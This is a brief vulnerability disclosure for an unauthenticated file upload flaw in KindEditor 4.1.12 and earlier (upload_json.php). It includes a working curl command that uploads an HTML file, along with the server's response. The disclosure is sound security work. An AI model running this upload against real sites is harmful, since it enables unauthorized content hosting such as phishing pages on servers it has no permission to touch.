Title:File upload vulnerability in Kindeditor <= 4.1.12
It appears there is a remote file upload vulnerability in kindeditor<= 4.1.12 specifically in kindeditor/php/upload_json.php. The file doesn't sanitize user input or check that a user should be uploading files to the system.  It appears it doesn't allow .php, phtml, shtml or other executable extensions. You can upload .html and call it as its uploaded to the web server path. But no server side code exec.

A simple curl request to kindeditor/php/upload_json.php?dir=file with the data filename=test.html set via POST request is all that's require to exploit this vulnerability:

$ curl -F "imgFile=@test.html" http://example.com/kindeditor/php/upload_json.php?dir=file

{"error":0,"url":"/kindeditor/php/../attached/file/20170613/20170613203236_37481.html"}